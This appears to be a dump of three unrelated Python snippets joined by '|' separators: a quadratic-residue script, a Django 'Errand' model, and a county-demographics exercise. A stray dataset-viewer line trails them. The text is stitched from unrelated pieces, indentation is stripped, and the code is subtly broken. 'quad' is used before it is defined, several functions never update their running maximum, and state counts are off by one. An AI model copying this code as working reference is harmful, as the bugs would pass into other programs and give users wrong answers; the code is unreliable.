negativeone = np.zeros ([0,2])
P = 30
def primecheck(x):
if x==1:
return False
for ii in range(2,math.floor(np.sqrt(x))+1):
if x%ii ==0:
return False
return True
primelist=[]
for i in range (1,P+1):
if primecheck(i)==True:
primelist.append(i)
for p in primelist:
num = []
for n in range (0,p):
for k in range (0,n+1):
if n==(k**2)%p:
nn = n in num
if nn == False:
num.append(n)
kk = k in num
if kk == False:
num.append(k)
quad = np.vstack ([quad, np.array ([p,len(num)])])
print('These are the quadractic residues')
print (quad)
for p in primelist:
Q = "False"
for n in range (0,p):
if (p-1) == (n**2)%p:
Q = "True"
negativeone = np.vstack ([negativeone, np.array([p,Q])])
print ('When -1 is a quadratic residue:')
print (negativeone) |
from django.db import models
# Create your models here.
# Model for an Errand that includes the name of the errand and whether it has been finished
class Errand(models.Model):
name = models.CharField(max_length=250)
finished = models.BooleanField(default=False, blank=True, null=True)
def __str__(self):
return self.name |
import json
def main():
with open('county_demographics.json') as demographics_data:
counties = json.load(demographics_data)
print(alphabetically_first_county(counties))
print(county_most_under_18(counties))
print(percent_most_under_18(counties))
print(most_under_18(counties))
print(state_with_most_counties(counties))
def alphabetically_first_county(counties):
"""Return the county with the name that comes first alphabetically."""
first = counties[0]["County"]
for county in counties:
if county["County"] < first:
first = county["County"]
return first
def county_most_under_18(counties):
"""Return the name and state of a county ("<county name>, <state>") with the highest percent of under 18 year olds."""
highest = counties[0]["Age"]["Percent Under 18 Years"]
state = counties[0]["State"]
cName = counties[0]["County"]
for county in counties:
if county["Age"]["Percent Under 18 Years"] > highest:
highest=county["Age"]["Percent Under 18 Years"]
state=county["State"]
cName= county["County"]
return cName + ' ' + state
def percent_most_under_18(counties):
"""Return the highest percent of under 18 year olds."""
highest = counties[0]["Age"]["Percent Under 18 Years"]
cName = counties[0]["County"]
for county in counties:
if county["Age"]["Percent Under 18 Years"] > highest:
cName = county["County"]
percent = county["Age"]["Percent Under 18 Years"]
return str(highest)
def most_under_18(counties):
"""Return a list with the name and state of a county ("<county name>, <state>") and the percent of under 18 year olds for a county with the highest percent of under 18 year olds."""
highest = counties[0]["Age"]["Percent Under 18 Years"]
state = counties[0]["State"]
cName = counties[0]["County"]
for county in counties:
if county["Age"]["Percent Under 18 Years"] > highest:
cName = county["County"]
percent = county["Age"]["Percent Under 18 Years"]
state=county["State"]
return cName + ' ' + state + ' ' + str(highest)
def state_with_most_counties(counties):
"""Return a state that has the most counties."""
#Make a dictionary that has a key for each state and the values keep track of the number of counties in each state
#Find the state in the dictionary with the most counties
#Return the state with the most counties
boi = {}
for x in counties:
state = x["State"]
trfl = state in boi
if (trfl == False):
boi[state] = 0
else:
boi[state] = boi[state] + 1
state = "CA"
highest = boi["CA"]
for x in boi:
if (boi[x] > highest):
highest = boi[x]
state = x
return state + str(highest)
def your_interesting_demographic_function(counties):
"""Compute and return an interesting fact using the demographic data about the counties in the US."""
highest = counties[0]["Age"]["Percent Under 18 Years"]
cName = counties[0]["County"]
for county in counties:
if county["Age"]["Percent Under 18 Years"] > highest:
cName = county["County"]
percent = county["Age"]["Percent Under 18 Years"]
return str(highest)
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.